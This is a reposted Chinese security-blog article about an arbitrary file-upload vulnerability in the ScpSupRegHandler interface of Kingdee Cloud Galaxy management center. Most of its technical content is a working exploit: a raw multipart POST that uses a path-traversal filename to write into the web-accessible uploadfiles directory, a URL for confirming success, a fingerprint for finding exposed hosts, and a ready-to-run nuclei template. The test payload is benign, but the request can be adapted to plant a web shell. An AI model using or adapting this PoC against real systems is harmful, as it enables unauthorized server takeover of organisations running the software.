金蝶云星空-管理中心ScpSupRegHandler文件上传

admin 2023年11月5日21:32:58评论275 views字数 1785阅读5分57秒阅读模式

扫码领资料

获网安教程

免费&进群

金蝶云星空-管理中心ScpSupRegHandler文件上传

金蝶云星空-管理中心ScpSupRegHandler文件上传

本文由掌 - 会唱会跳会敲键盘 稿

0x01 漏洞介绍
金蝶云星空是一款基于领先的可组装低代码PaaS平台,全面服务客户研发、生产、营销、供应链、财务等领域转型的企业管理服务平台。它已支持IPD、精益、阿米巴等先进管理理念在3.1万余家客户实践,一起助力企业“产品力、获客力、交付力、口碑力” 。该漏洞存在于ScpSupRegHandler接口下,服务器对用户输入的数据没有进行严格的过滤,攻击者可以利用该漏洞获取服务器管理权限。
0x02 影响产品

  1. 金蝶云星空-管理中心

0x03 语法特征

  1. app="金蝶云星空-管理中心"

0x04 漏洞复现

页面

金蝶云星空-管理中心ScpSupRegHandler文件上传

POC

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1Host: User-Agent: MozillaConnection: keep-aliveContent-Length: 311Content-Type: multipart/form-data; boundary=hgth5DKrnIAccept-Encoding: gzipSL-CE-SUID: 72--hgth5DKrnIContent-Disposition: form-data; name="dbId_v".--hgth5DKrnIContent-Disposition: form-data; name="FID"2022--hgth5DKrnIContent-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.txt"Content-Type: text/plaintest--hgth5DKrnI--

金蝶云星空-管理中心ScpSupRegHandler文件上传

上传后访问:
url+/k3cloud/uploadfiles/test.txt ,出现"test"文本即成功

金蝶云星空-管理中心ScpSupRegHandler文件上传

nuclei poc如下:

id: kingdee-k3cloud-fileuploadinfo:  name: kingdee-k3cloud-fileupload  author: kingdee-k3cloud-fileupload  severity: critical  tags: app="金蝶云星空-管理中心"requests:  - raw:      - |        POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1        Host: {{Hostname}}        Content-Type: multipart/form-data; boundary=hgth5DKrnI        --hgth5DKrnI        Content-Disposition: form-data; name="dbId_v"        .        --hgth5DKrnI        Content-Disposition: form-data; name="FID"        2022        --hgth5DKrnI        Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.txt"        Content-Type: text/plain        test        --hgth5DKrnI--      - |        GET /k3cloud/uploadfiles/test.txt HTTP/1.1        Host: {{Hostname}}    matchers-condition: and    matchers:      - type: word        part: body_2        words:          - "test"      - type: status        status:          - 200

金蝶云星空-管理中心ScpSupRegHandler文件上传

.

金蝶云星空-管理中心ScpSupRegHandler文件上传

~

+++

 

金蝶云星空-管理中心ScpSupRegHandler文件上传

 


Xray


cs4.0使

 | CNVD

SRC++

     | IP

金蝶云星空-管理中心ScpSupRegHandler文件上传

+~~ 

原文始发于微信公众号(掌控安全EDU):金蝶云星空-管理中心ScpSupRegHandler文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月5日21:32:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金蝶云星空-管理中心ScpSupRegHandler文件上传http://cn-sec.com/archives/2178014.html

发表评论

匿名网友 填写信息